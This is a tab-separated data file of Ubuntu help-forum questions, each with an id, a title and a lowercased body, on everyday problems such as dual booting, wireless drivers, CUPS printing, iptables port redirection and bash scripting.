427542	gui programs launched from command line appear behind other windows	often , when i launch a gui application from the command line , its window will appear behind other windows . for example , if i make a terminal full-screen and launch gitk , it will not appear to have started , but is in fact behind the terminal . it has n't risen to the top , but it does have focus , so keystrokes are sent to it . it does not occur when an application is launched from the dash or search box , or from another application ( eg . `` show in files '' from an ide . ) i 'm using ubuntu 13.10 , unity and have some customisations via compizconfig and unity tweak tool . the obvious question now is : how can i make launched applications show in the foreground ?
427543	how to test if graphics card is causing freezes	my ubuntu 12.04 distro often freezes when for example watching a youtube video . my system is a 15,6 inch bto vbook 15cl17 full hd ips with a intel hd graphics 4600. lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphic after a crash my dmesg.log looks like this : http : //paste.ubuntu.com/7010739/ and my lshw output is as follows : http : //paste.ubuntu.com/7010769/ how can i test if my graphics driver is causing this problem ?
427545	is it possible to use a music visualizer program as your wallpaper ? ubuntu 13.10	i would like my desktop background to display music/audio visualizations constantly . currently i use project m for visualizations , not opposed to swapping it out for something else though . using banshee for my music player .
427546	print with other user on network printer ( cups )	to start off in case that makes any difference : i am doing this from a live-usb-stick of 13.10 to check if everything works before actually installing ubuntu and leaving windows behind . printing on a network printer i print via network but the print server only accepts certain usernames . the 'ubuntu ' username obviously is n't one of them . as being forced to call the ubuntu user the same as the user allowed for printing is just a dirty workaround ( which i did n't try but assume would work ) i looked for a solution , but i did n't find any option to manually set a username in the gui . so i googled . changing the user i found this bug report # 856776 via use different username on cups remote printing when printing with lp -u username -d printername file.ext everything works . on the last comment of this issue i found what i believe to be a solution namely adding a directive in client.conf to force the username to something different . but i could n't make this work : /etc/cups/client.conf does n't exist when i create ~/.cups/client.conf and add user bob this does n't help i am pretty new to ubuntu and maybe there is something i forgot . restart something ? add something else ? how can i make this work ?
427547	window borders suddenly became transparent and ugly	all of a sudden my window frames got really ugly and smudgy . i suspect it came from an update of ubuntu , using 13.10 with the latest updates . i would guess that unity is trying to make the window frames transparent and give me a delightful surprise , but instead i get this . i have tried turning off transparency in dconf-editor , but to no avail ( it was off all along ) . what to do ?
427550	best ubuntu for my poor pc	recently i got an old laptop with 1 gb ram and 1.7 ghz proccessor . also i have found the terrible windows ! i will be glad if i can completely destroy the installation of windows xp and download the beautiful ubuntu , but i 'm confused ... would it be okay if i download 12.10 32bit ? because i think it will be slow . any idea about that ? or should i use xubuntu ? thanks advance .
427552	alt tab for all workspace	i thought alt + tab would cycle though all open programs that are in different workspaces . i think this should be dynamic according to if you have workspace toggle on or off . i know this can be done with ccsm , but i like keep my systems with minimal tweaks as that makes the dist-upgrade process a smooth transition .
427553	installing ubuntu on lenovo ideapad u530 with windows 8.1 preinstalled	there has been a lot of discussion on installing ubuntu on machines with preinstalled windows 8.1 . i noticed that a great amount of work is required . before i go through with this , i was wondering if anyone installed ubuntu successfully on exactly the model that i have which is lenovo ideapad u530 and if there are specific tips/problems with the installation .
427556	best way to achieve data redundancy ond different sized hard disks	i have a 2tb and a 1.5 tb hard drive . my ultimate goal is that i have a partition of 1.5 tb which is mirrored to both disks , so that i wo n't lose data if one hard disk crashes . of course i 'd like to be able to use the remaining 500 gb as well , but i do n't need it mirrored . this is only about data , the system is on another harddisk . i 'm not sure which is the best way to achieve that . i have thought of the following things : raid 1 ( although i 'm not sure whether i could still use the remaining 500 gb then ) . also i read that the partitions should be exactly the same size.. set up some rsync ( not very convenient ) use lvm ( although i 'm not sure what to with that exactly ) my goal is to a ) have redundancy so i wo n't lose data if one hd crashes and b ) ideally gaining some performance if possible using e.g . raid any advice is appreciated !
427558	how to boot ubuntu alongside windows 8 on aspire one 765	i ca n't seem to get ubuntu 12.04 or 13.04 installed properly alongside windows 8 on a netbook acer aspire one 765 . first thing i tried was with a live usb/bootable usb . this failed after disabling secure boot and putting usb hdd on no.1 on the list . the system does not recognize any usb device although the usb works fine on another laptop . then i tried unetbootin and wubi . after installation i get a windows 8 boot menu in which i can choose between w8 and ubuntu . when i choose ubuntu i get a screen that says it can not boot windows because of hardware- or software changes . it needs the windows install disk . file : \ubuntu\winboot\wubi1dr.mbr status : 0xc000007b installing with wubi was sort of my last option to finally get ubuntu on this device but i seem to be stuck with w8 here . all help is appreciated !
427560	ubuntu battery not charging or not detected	here is question/answer just to help the community . i just bought a new asus n750j . i had some issues installing kubuntu . problems were the cpu fan always running at full speed , battery not charging , not even detected ... i had difficulties to find a solution over the internet . i have found it after two days of searching . everything was be related to acpi ( advanced configuration and power interface ) in my case . i fixed all my issues with a simple command . when you boot , the crub screen appears . edit your grub entry and add acpi=nolapic it fixed all my issues on my laptor . cpu fan working normally and battery charging . hope this will help someone ; ) olivier
427561	what owner and mod should i give to /var/www	i would like to be able to edit the source code of my website from my editor and also allow the website to load in the browser . with sudo chown -r 'www-data ' : 'www-data'the code is not editable but loads on the browser and with sudo chown -r 'username ' : 'username ' the other way around . how can i get both ?
427562	guide for beginner for ubuntu touch	i approach to the first time at the world of ubuntu , my interest is to develop app for ubuntu touch , my question is : where can i find some good guides to develop on ubuntu touch ? thank you very much
427563	transfers videos into nwz-e384	so , i 've recently bought a new music player . it 's brand is sony . but when i go to rhythmbox and sync it says permission denied . so i have to go to nautilus and copy the files . so i want to ask how do sync the music thru rhythmbox so that the player can read the music tag ( i did copy in a manual way but the player did n't recognize the tag ) . and i also want to ask how to put videos there . i have just put a video that have the .wmv file type , the same requirement at sony 's website but my device did not recognize that video . p/s : i opened the properties window and it says i used windows media player version 8 .
427564	how to make windows 8.1 and ubuntu 13.10 dual-boot correctly ?	my computer has two hdds , one has 2t ( disk 1 ) while the other one has 500g ( disk 2 ) . first i installed windows 8.1 on disk1 and everything went well . next i installed ubuntu 13.10 desktop by a usb stick . i performed disk partition on disk2 manually and this is the partitions on disk2 : /dev/sdb1 | /boot | primary /dev/sdb2 | / | primary /dev/sdb5 | /swap | logical /dev/sdb6 | /home | logical i placed boot loader on /dev/sdb1 and then installation went on . after finishing copying files , the computer restarted and booted from hdd instead of usb stick . however , when i set the boot device as disk 1 i could enter windows 8.1 but when i set disk2 as boot device i got grub problem reminding me of a device not found , entering grub rescue mode . i want to know what happened to ubuntu installation and what can i do now .
427571	ubuntu 12.04.3 64-bit live cd interrupted during gparted execution , what can i use to recover data ?	okay , so i started gparted in a live cd environment ( an older 12.04.3 64-bit image from 2013 , from when .3 just came out [ which i needed to get working on my efi computer with secure boot enabled ] ) . then i resized and moved my windows partition ( towards the beginning of hard drive ) . then i got bored and wanted to browse the web , but unfortunately this livecd did n't include the proper drivers for my new laptop to connect seamlessly to the internet . i noticed that there were 'additional drivers ' to activate the broadcom proprietary drivers , so i checked that . now , after 'downloading and installing ' ( which i doubt it downloaded because the ethernet port was n't functioning ) my computer left its gui environment and entered a terminal-like session with a bunch of debug output , which i 'm assuming means that there was a kernel-level crash due to conflicts with the included broadcom drivers and my specific hardware . i probably did several things wrong : being impatient . trying to activate drivers that interfere with the kernel during a system critical event using an older live cd without full compatibility for my laptop 's hardware regardless . here i am . so any help to unscrew myself in this situation would be appreciated . at the moment the computer is still on ( with the debug information printed on the screen ) . there is still a lot of hard drive activity going on , from what i can tell by the hard drive light , so maybe gparted is still running in the background ( which if it is i feel maybe i can leave the computer running over night and then manually shut it down later when the hard drive light is inactive ) . here is what is currently on screen on the affected laptop ( keep in mind i 'm copying this from a somewhat blurry phone so not all the output could be accurate ) : [ 6429.820238 ] [ < ffffffff81052cfa > ] warn_slowpath_null+0x1a/0x20 [ 6429.821249 ] [ < ffffffff8105b9ba > ] local_bh_enable_ip+0x7a/0xa0 [ 6429.822279 ] [ < ffffffff8169e8e9 > ] _raw_spin_unlock_bh+0x19/0x20 [ 6429.823260 ] [ < ffffffffa00c030c > ] nouveau_bios_run_init_table+0x7d/0xa0 [ nouveau ] [ 6429.825115 ] [ < ffffffffa00c7a11 > ] nouveau_dp_dpms+0x71/0xb0 [ nouveau ] [ 6429.825984 ] [ < ffffffffa0135d4d > ] nvd0_sor_dpms+0x16d/0x180 [ nouveau ] [ 6429.826863 ] [ < ffffffffa01359b0 > ] ? nvd0_sor_dp_train_adj+0x260/0x260 [ nouveau ] [ 6429.827709 ] [ < ffffffffa0134ee0 > ] ? nvd0_crtc_destroy+0xa0/0xa0 [ nouveau ] [ 6429.828541 ] [ < ffffffffa0135750 > ] ? evo_init_pio+0x130/0x130 [ nouveau ] [ 6429.829402 ] [ < ffffffffa01362a3 > ] nvd0_sor_mode_set+0x153/0x350 [ nouveau ] [ 6429.830239 ] [ < ffffffffa0080132 > ] drm_crtc_helper_set_mode+0x432/0x450 [ drm_kms_helper ] [ 6429.831068 ] [ < ffffffffa0080fff > ] drm_crtc_helper_set_config+0x84f/0xb00 [ drm_kms_helper ] [ 6429.831891 ] [ < ffffffff81382eb0 > ] ? fb_set_var+0xe9/0x3a0 [ 6429.832735 ] [ < ffffffff8138fb47 > ] ? fbcon_putcs+0x137/0x170 [ 6429.833556 ] [ < ffffffffa007d7ea > ] drm_fb_helper_pan_display+0x8a/0xd0 [ drm_kms_helper ] [ 6429.834379 ] [ < ffffffff813825fd > ] fb_pan_display+0xbd/0x170 [ 6429.835195 ] [ < ffffffff813933e9 > ] bit_update_start_+0x29/0x60 [ 6429.836051 ] [ < ffffffff81392c02 > ] fbcon_switch+0x3b2/0x560 [ 6429.836889 ] [ < ffffffff81401849 > ] redraw_screen+0x189/0x2a0 [ 6429.837703 ] [ < ffffffff81390efa > ] fbcon_blank+0x21a/0x2d0 [ 6429.838510 ] [ < ffffffff810543dd > ] ? console_unlock.part.9+0x24d/0x2e0 [ 6429.839313 ] [ < ffffffff81040af9 > ] ? default_spin_lock_flags+0x9/0x10 [ 6429.840133 ] [ < ffffffff8169ea6e > ] ? _raw_spin_lock_irqsave+0x2e/0x40 [ 6429.840964 ] [ < ffffffff81063df8 > ] ? lock_timer_base.isra.35+0x38/0x70 [ 6429.841784 ] [ < ffffffff810651b3 > ] ? mod_timer+0x143/0x2f0 [ 6429.842595 ] [ < ffffffff81402d1e > ] do_unblank_screen.part.16+0x9e/0x180 [ 6429.843407 ] [ < ffffffff81402e48 > ] do_unblank_screen+0x48/0x80 [ 6429.844216 ] [ < ffffffff81402e90 > ] unblank_screen+0x10/0x20 [ 6429.845024 ] [ < ffffffff8133eabd > ] bust_spinlocks+0x1d/0x40 [ 6429.845831 ] [ < ffffffff8169fa5f > ] oops_end+0x3f/0xf0 [ 6429.846640 ] [ < ffffffff81017808 > ] die+0x58/0x90 [ 6429.847646 ] [ < ffffffff8169f3c4 > ] do_trap+0xc4/0x170 [ 6429.848472 ] [ < ffffffff81014f15 > ] do_invalid_op+0x95/0xb0 [ 6429.849263 ] [ < ffffffffa0718713 > ] ? wdev_priv.part.7+0x4/0x6 [ wl ] [ 6429.850043 ] [ < ffffffff8133b6c0 > ] ? sprintf+0x40/0x50 [ 6429.850848 ] [ < ffffffff816a819b > ] invalid_op+0x1b/0x20 [ 6429.851637 ] [ < ffffffffa0718713 > ] ? wdev_priv.part.7+0x4/0x6 [ wl ] [ 6429.852430 ] [ < ffffffffa0717ada > ] wl_cfg80211_detach+0xfa/0x100 [ wl ] [ 6429.853224 ] [ < ffffffffa070fb3f > ] wl_free_if.isra.9+0x2f/0xd0 [ wl ] [ 6429.854019 ] [ < ffffffffa07106ed > ] wl_free+0x6d/0x290 [ wl ] [ 6429.854823 ] [ < ffffffff816859d6 > ] ? printk+0x61/0x63 [ 6429.855614 ] [ < ffffffffa0718669 > ] wl_pci_probe+0x573/0x59d [ wl ] [ 6429.856399 ] [ < ffffffff81040af9 > ] ? default_spin_lock_flags+0x9/0x10 [ 6429.857192 ] [ < ffffffff8136073c > ] local_pci_probe+0x5c/0xd0 [ 6429.857983 ] [ < ffffffff813620b9 > ] __pci_device_probe+0xf9/0x100 [ 6429.858798 ] [ < ffffffff813620fa > ] pci_device_probe+0x3a/0x60 [ 6429.859592 ] [ < ffffffff81428e78 > ] really_probe+0x68/0x200 [ 6429.860383 ] [ < ffffffff81429175 > ] driver_probe_device+0x45/0x70 [ 6429.861196 ] [ < ffffffff8142924b > ] __driver_attach+0xab/0xb0 [ 6429.861985 ] [ < ffffffff814291a0 > ] ? driver_probe_device+0x70/0x70 [ 6429.862819 ] [ < ffffffff814273d6 > ] bus_for_each_dev+0x56/0x90 [ 6429.863609 ] [ < ffffffff81428abe > ] driver_attach+0x1e/0x20 [ 6429.864397 ] [ < ffffffff81428670 > ] bus_add_driver+0x1a0/0x270 [ 6429.865236 ] [ < ffffffffa08f6000 > ] ? 0xffffffffa08f5fff [ 6429.866041 ] [ < ffffffffa08f6000 > ] ? 0xffffffffa08f5fff [ 6429.866814 ] [ < ffffffff814297a6 > ] driver_register+0x76/0x130 [ 6429.867539 ] [ < ffffffff810b4fa0 > ] ? add_kallsyms+0x1f0/0x1f0 [ 6429.868253 ] [ < ffffffffa08f6000 > ] ? 0xffffffffa08f5fff [ 6429.868954 ] [ < ffffffff81361d96 > ] __pci_register_driver+0x56/0xd0 [ 6429.869626 ] [ < ffffffff81046053 > ] ? set_memory_nx+0x43/0x50 [ 6429.870268 ] [ < ffffffffa08f601e > ] wl_module_init+0x1e/0x1000 [ wl ] [ 6429.870897 ] [ < ffffffff8100203f > ] do_one_initcall+0x3f/0x170 [ 6429.871472 ] [ < ffffffff810b801e > ] sys_init_module+0xbe/0x230 [ 6429.872055 ] [ < ffffffff816a7029 > ] system_call_fastpath+0x16/0x1b [ 6429.872625 ] -- - [ end trace 7429d3d2fee72b75 ] -- - p.s . when by 'activate ' and 'downloading & installing ' the broadcom drivers , did it mean activating drivers that were already on disc ( and already installed , but just not in use ) ? or did it mean it had to install the drivers ( to where i do n't know [ maybe a temporary ram filesystem ? ] , if the only non-volatile read-writable location to install to that i have available is the hard drive , but afaik a livecd would never dump temporary files onto your hard disk , especially if the whole hard drive contains partitions that other operating systems use ) ? p.p.s . my laptop is an asus g750jx : http : //www.asus.com/notebooks_ultrabooks/asus_rog_g750jx/ # specifications p.p.p.s . yes , i know using gparted to move the header for the windows system partition will invalidate the boot information to where windows will no longer boot , but i was planning to run the windows recovery environment to repair the issue afterwards .
427574	dual booting windows 7 and ubuntu on a hybrid ssd/hdd	i am in the process of building a computer with this type of set up . 1 500 gb ssd and 2 hdds one 4tb and one 1 tb my goal is to use the ssd for the actual operating systems and favourite applications for both windows 7 and ubuntu 13.10 the 4tb hdd for windows 7 data storage and the 1tb hdd for ubuntu 13.10 data storage . does anyone know the details for the installation steps for the above set up . thanx in advanced p.s . i am open to other suggestions if the above ideal is not possible
427575	installing ubuntu with unity but without the `` big brother '' add-ons and prebundled app cruft	i just tried the minimal ubuntu install ( a 36mb mini.iso ) to see if i could get a normal ubuntu desktop installation with unity but without the unwanted cruft such as amazon/ebay/music suggestions in search , and the libreoffice suite , and many other things such as games , disc burner , etc . however , it looks the `` ubuntu desktop '' selection in the installer still gets me all of those things i do n't want . therefore , whereas i know these can be uninstalled after the initial setup , i 'm still wondering if there 's a way to set ubuntu up without those things from the start , so that only the basic necessities of the unity desktop are there . i 've tried googling this this but only found directions on how to remove stuff from an already stuffed ubuntu installation .
427578	rename the extension of many files	i would like to rename the extension .tar ? h=ocdist105 & = % 2fdata1 % 2f4070d0f0f1d62757 % 2frequested_files for just .tar i tried the command rename 's/\.tar ? h=ocdist105 & p= % 2fdata1 % 2f4070d0f0f1d62757 % 2frequested_files $ /.tar/ ' *.tar ? h=ocdist105 & p= % 2fdata1 % 2f4070d0f0f1d62757 % 2frequested_files but it seems not to be working . i have 550 files with that extension . can anyone help me ? thanks
427584	migrate system to larger drive	i had a small hard drive ( 13 gb ) which was too small . i added another ( 160 gb ) but the apps do n't seem to use it . file manager appears to but no other apps , specifically , the update manager wo n't use it . i need to use this new drive because there is too little space to download the latest updates to the kernel , etc . so , how do i tell update manager to use this drive ? how do i get other apps to use it ? running ubuntu 12.04 . thanks .
427588	heredoc param evaluation in bash	$ times= $ 1 ssh -a vyas @ subdom.dom.net < < - eof for i in { 1.. $ times } do echo 'iteration ' $ i url='vyas @ app' echo 'connecting to ' $ url done eof both echo statements print blanks for the variable name : iteration connecting to $ times= $ 1 ssh -a vyas @ subdom.dom.net < < - \eof for i in { 1.. $ times } do echo 'iteration ' $ i url='vyas @ app' echo 'connecting to ' $ url done eof output : iteration { 1âś } connecting to vyas @ app i 'm executing the above scripts with ./rt.sh ( ./rt.sh 5 ) . how do i get the value of $ i to read 1.. $ times ?
427589	how to do off-screen render with opengl in ubuntu with xserver ?	i have an application that uses opengl 4.2 to do off-screen render [ the result goes to a video in my case ] . i need to run it on ubuntu 13.10 server . i do n't need ( and do n't want ) to have the actual desktop interface . but as far as i can understand i need to run a xserver in order to open the opengl context . in fact , i did it . when i do a xinit , i am able to execute my application and it runs perfectly . but i have 2 problems : i do n't know how to set up the xserver to start with ubuntu ( just like a service/daemon or something like ) i ca n't execute more than 1 application . it seems my application uses the `` xserver connection '' exclusively . so i am not able to run more than once . how do i solve these 2 problems above ?
427591	unable to install the netflix desktop	i ca n't seem to get the netflix desktop installed , i 've gone through a lot of the different notes on the forums here and else where , but i ca n't seem to get this figured out running ubuntu 13.10 : mikem @ ubuntu : ~ $ sudo apt-get install netflix-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : netflix-desktop : depends : wine-browser-installer ( = 0.8.7-2~ubuntu13.10.1 ) but it is not going to be installed depends : wine-silverlight5.1-installer but it is not going to be installed e : unable to correct problems , you have held broken packages . mikem @ ubuntu : ~ $ sudo apt-get install wine-browser-installer reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine-browser-installer : depends : wine-compholio ( > = 1.7.0-3 ) but it is not installable e : unable to correct problems , you have held broken packages . mikem @ ubuntu : ~ $ sudo apt-get update ... fetched 588 kb in 4s ( 126 kb/s ) reading package lists ... done mikem @ ubuntu : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . mikem @ ubuntu : ~ $ sudo apt-get -f install netflix-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : netflix-desktop : depends : wine-browser-installer ( = 0.8.7-2~ubuntu13.10.1 ) but it is not going to be installed depends : wine-silverlight5.1-installer but it is not going to be installed e : unable to correct problems , you have held broken packages . mikem @ ubuntu : ~ $ apt-mark showhold mikem @ ubuntu : ~ $ tried via aptitude as well : mikem @ ubuntu : ~ $ sudo aptitude install netflix-desktop [ sudo ] password for mikem : the following new packages will be installed : netflix-desktop wine-browser-installer { ab } wine-silverlight5.1-installer { a } 0 packages upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 65.9 kb of archives . after unpacking 968 kb will be used . the following packages have unmet dependencies : wine-browser-installer : depends : wine-compholio ( > = 1.7.0-3 ) which is a virtual package . depends : ttf-mscorefonts-installer but it is not going to be installed . depends : mesa-utils but it is not going to be installed . or glx-utils which is a virtual package . depends : python-pyxattr but it is not going to be installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) netflix-desktop [ not installed ] 2 ) wine-browser-installer [ not installed ] 3 ) wine-silverlight5.1-installer [ not installed ] accept this solution ? [ y/n/q/ ? ] n *** no more solutions available *** the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) netflix-desktop [ not installed ] 2 ) wine-browser-installer [ not installed ] 3 ) wine-silverlight5.1-installer [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . here are my source lists in case that helps as well : mikem @ ubuntu : ~ $ cat /etc/apt/sources.list.d/* deb http : //ppa.launchpad.net/ehoover/compholio/ubuntu saucy main # deb-src http : //ppa.launchpad.net/ehoover/compholio/ubuntu saucy main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # deb http : //ppa.launchpad.net/mumble/release/ubuntu saucy main # disabled on upgrade to saucy # deb-src http : //ppa.launchpad.net/mumble/release/ubuntu raring main deb http : //ppa.launchpad.net/mumble/release/ubuntu raring main # deb-src http : //ppa.launchpad.net/mumble/release/ubuntu raring main # deb http : //ppa.launchpad.net/mumble/release/ubuntu saucy main # disabled on upgrade to saucy # deb-src http : //ppa.launchpad.net/mumble/release/ubuntu raring main deb http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu saucy main deb http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu raring main deb http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu saucy main # deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main mikem @ ubuntu : ~ $ cat /etc/apt/sources.list deb http : //us.archive.ubuntu.com/ubuntu/ saucy main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ saucy-security main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ saucy-updates main restricted universe multiverse # deb http : //download.ebz.epson.net/dsc/op/stable/debian/ lsb3.2 main # disabled on upgrade to saucy
427593	how do i search in google earth ?	i am using ubuntu 12.04lts and i just installed google earth . i tried to search japan so i typed tokyo . japan it resulted in did i do something wrong ? please tell me
427594	where is the url package ?	the url package contains code to parse and handle urls . it was originally part of w3 , the web browser written entirely in emacslisp . now it is a separate library available in emacs 22 . i am running emacs 23.4.1 on my local ubuntu machine and 24.3.1 on my freebsd development server . i am trying to decode a url i pasted into a buffer by using m-x url-unhex-string , but neither version of emacs has this , or any function mentioned in that emacswiki page . while i do n't have administrative access to the server , i do to my local machine . is there a package i 'm missing that i can get through synaptic or something , or a configuration option/variable that needs to be changed ? even the gnu.org page for the url package says it should be included with emacs .
427599	ca n't get wireless to work on an acer aspire 4310.. older answers did n't work	i am having trouble with the wireless card on my mom 's acer aspire 4310.. i got her to use linux on her old toshiba and she wants it on this acer too but i 'm having trouble getting the wireless to work.. i am currently connected via ethernet.. here is the lspci output 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 02:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 0a:06.0 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 0a:06.2 sd host controller : o2 micro , inc . integrated mmc/sd controller ( rev 02 ) 0a:06.3 mass storage controller : o2 micro , inc . integrated ms/xd controller ( rev 01 ) and this is what rfkill all says 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no at first it was soft blocked then i ran rfkill unblock wifi but it still wo n't work ! there are no wireless networks in the panel and the system settings only shows the ethernet connection ... i have installed the sta drivers and that did n't help either.. any ideas ? additional details : fresh ubuntu 13.10 install and fully updated
427600	persist port routing from 80 to 8080	i use amazon ec2 instance which works via ubuntu . by default according security restrictions i ca n't bin my application to port 80 , so i just bind it port 8080 and then set routing redirect from port 80 to 8080 via the following command : iptables -t nat -a prerouting -p tcp -- dport 80 -j redirect -- to 8080 but i found that when i reboot the server this settings no longer active untill i invoke this command again . so my question is how to enable port 's redirect work even if system was rebooted ?
427602	terminal and bash meta/alt key combinations	it seems to be impossible to use the alt key as the meta modifier for some bash line navigation commands such as m-f and m-b . this is because meta = alt , and alt- < letter > opens any menu that starts with that letter ( if it exists ) . because f and b correspond to the file and buffer menus respectively , pressing m-f or m-b opens that menu . m-d however works as expected because there is no menu whose name starts `` d '' . how can this be worked around in ubuntu ( 13.10 ) ? i do n't consider using esc as the meta key to be a solution . on a somewhat different note : would it be possible to make ubuntu behave more like e.g . os x where the super ( cmd/win ) key is used for most ui related shortcuts , and ctrl and alt are always sent directly to the terminal emulator ? this would solve the current issue + many others .
427603	can i build a java-based game and move it to ubuntu for the future tablets and phones ?	i am on my way to learn java game programming to make my own android apps . my question is if i can built a java-based game and move it to ubuntu for the future tablets and phones .
427604	subdownloader no longer working	i 've had this problem for a little while now : subdownloader no longer succeeds to download subtitles . it finds the subtitles fine , but fails to download them ( there 's no error message , the status just stays forever `` downloading ... '' until i tell it to abort ) . i know there 's alternatives to this program ( i 've successfully installed extensions for smplayer and vlc ) , but the convenient thing i like about subdownloader is that it can download several subtitles in one go ( useful if you have a lot of videos to manage ) . anyone knows how to fix this ?
427609	problem opening programs and where is what i intall ?	i download java to run minecraft and also other programs that need installation . when i open it , instead of opening it with an installation or something it opens the folders inside of the program with the archive manager . i tried to open it with wine but java for example is .tar.gz . the other problem i got is that when i install a program from terminal i can not find it ( i 've tried searching it ) and also i ca n't use it , for example unrar . i am new to this software . i would be very thanks full if you help me .
427610	how to change icons on gnome favorites bar ?	i 'm new to ubuntu , and i switched to gnome and managed to change the icons ! but when i open a program that has its own ( new ) icon on the favorites bar ( if that 's its name ) i still see the original icon ! this also happens when i switch windows with alt+tab ! is there a way i can change that ? edit :
427612	lenovo z510 tuchpad	is there any way to confitgure my touchpad in ubuntu . my touchpad has different behaviour in ubunut as it has in windows . i know that the reason is that i have n't installed a proper driver yet . lenovo probably support only windows . is there any way how to improove , in ubuntu , my current behaviour with touchpad ? main problem : it is too much sensitive , especially when i try to click on button , cursor moves a bit . i need an advice how to decrease sensibility in settings or something..
427618	scheduled power on/off of 2nd hdd	im using a ubuntu 13.10 server . i want to switch off the 2nd hdd completely and only power it up once a week to back up the system+data from the 1st hdd . i know how to use crontab , but i dont know how to switch off/on a hdd . p.s . can you recommend a good incremental backup tool/script ?
427620	x will not start while installing ubuntu 13.10 on an asus n550jv	i 've been trying to install ubuntu from a live usb on my asus n550jv-cn270h , of which the dvd drive has been replaced by an ssd ( crucial m500 480gb ) . when i select try ubuntu in grub the normal loading screen appears , but the screen gets stuck on the part where all 5 dots are filled in for a while . after trying to boot with nomodeset i can switch to a tty and all i have found out so far is that x does n't start . when trying to manually start it with startx , the log says `` ( ee ) screen ( s ) found , but none have a usable configuration . '' what should i try next ?
427623	u1 account shows three devices with cryptic names . how do i identify each account ?	three devices are showing up on u1 account . i think the devices are ( possibly ) a phone ( i have more than one ) , a pc ( i use several ) and a tablet . how do i identify these devices if the cryptic device names are current , and/or find out what the names are ? tia
427625	cp : invalid option -- '/ '	i am trying to recover my encrypted folder by using ubuntu live cd , i have done all the steps now all i want to do is to copy my /tmp/ecryptfs.bm59alvg to /home/ubuntu/myfolder directory . i am using this command : cp -rv/tmp/ecryptfs.bm59alvg/home/ubuntu/myfolder but then i am getting this error cp : invalid option -- '/ ' . please help me out how to copy data of /tmp/ecryptfs.bm59alvg to my /home/ubuntu/myfolder .
427626	ubuntu will not install on my lenovo n580	i have a lenovo n580 and i 've been trying to install ubuntu on it and all i get is a white screen after i boot through live cd and usb . i tried going to the bios to change to legacy but it does not help . any suggestions ?
